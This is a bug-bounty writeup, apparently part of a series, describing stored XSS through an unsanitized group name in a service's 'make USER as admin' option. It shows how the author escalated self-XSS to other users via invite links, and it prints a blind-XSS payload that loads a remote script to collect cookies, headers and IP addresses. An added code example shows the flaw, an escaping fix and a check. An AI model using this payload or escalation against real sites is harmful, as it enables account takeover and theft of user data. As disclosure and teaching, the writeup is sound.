Multiple XSS in * (2)


If you have read part 1, you will have seen that I found a stored self-XSS which could be escalated through the option ("make the USER as admin of group_name"), because group_name was not properly sanitized there.

Here is what I did to affect other users. You just need to create an invite link and get a user to join your group.

Once the user joins your group, you make them an admin using the option mentioned above (this requires no user interaction once they have joined the group).

Once the user is an admin, they see the same option ("make the USER as admin of group_name"), where group_name was not sanitized, and the XSS executes in their browser as well!

So was that the end of it?

No. I did more research and put a BXSS (blind XSS) payload "><script src="malicious_script_url"> in group_name.

Then I added a member by sending them an invite link.

Once the member clicked the invite link and accepted it, the XSS also executed on another subdomain!

The BXSS payload was provided by xsshunter, through which I was able to get user details such as:

a screenshot of the affected page, user cookies, headers, device information, IP address, etc.

That is a lot of information, enough to compromise user data and also take over the account.
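The two steps above (the unsanitized group_name in the "make USER as admin" option, and the blind-XSS payload stored in that field) come down to one rendering bug. The following is an added example, not code from the writeup or from the affected service: it renders that option with the group name concatenated straight into HTML, renders it again with escaping, and checks which version still carries a remote script. The function names, the markup layout and the "victim" user name are assumptions; the payload string is the one from the writeup, with malicious_script_url standing in for the attacker-controlled script (for example an xsshunter probe).

```javascript
// Added example (not the writeup's or the service's code). Shows why an
// unsanitized group_name in the "make USER as admin of group_name" option is
// stored XSS, and the escaping that fixes it. Function names and markup
// layout are assumptions; the payload is the one given in the writeup.

// Payload from the writeup: the leading "> closes the attribute value and
// the tag it sits in, so the script lands in the page whether group_name is
// rendered inside an attribute or as visible text.
const BXSS_PAYLOAD = '"><script src="malicious_script_url">';

// Vulnerable: group_name is concatenated into HTML in two contexts, an
// attribute value and the element's text, with no encoding in either.
function renderMakeAdminOptionVulnerable(userName, groupName) {
  return `<a href="#" data-group="${groupName}">` +
         `Make ${userName} as admin of ${groupName}</a>`;
}

// HTML escaping that is safe for both contexts used here (double-quoted
// attribute value, element text): it encodes quotes as well as & < >.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every untrusted value is escaped at the point it enters markup.
function renderMakeAdminOptionHardened(userName, groupName) {
  const u = escapeHtml(userName);
  const g = escapeHtml(groupName);
  return `<a href="#" data-group="${g}">Make ${u} as admin of ${g}</a>`;
}

// Check: list the src of every <script ...> that survived into the rendered
// markup. A render free of this stored XSS returns an empty list.
function injectedScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*"([^"]*)"/gi;
  return Array.from(html.matchAll(re), (m) => m[1]);
}

// The stored group name is rendered for the attacker (self-XSS) and again
// for every member promoted to admin, who sees the same option; promoting
// the victim is what turns the self-XSS into an attack on other users.
const vulnerable = renderMakeAdminOptionVulnerable('victim', BXSS_PAYLOAD);
const hardened = renderMakeAdminOptionHardened('victim', BXSS_PAYLOAD);
console.log('vulnerable:', injectedScriptSources(vulnerable)); // ['malicious_script_url', 'malicious_script_url']
console.log('hardened:', injectedScriptSources(hardened));     // []
```

The vulnerable render leaks the script twice because the payload breaks out of the attribute and is then rendered a second time as text; the hardened render contains only `&lt;script ...&gt;` as inert text. One caveat on what a blind-XSS probe can report: cookies come from document.cookie, so cookies flagged HttpOnly are not included, while headers and the IP address are taken from the probe's own request to the collector.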

Then I wrote a final report combining all my research and sent it to them.

Finally, I was acknowledged by Microsoft on their security researcher acknowledgement page (Feb 2019):
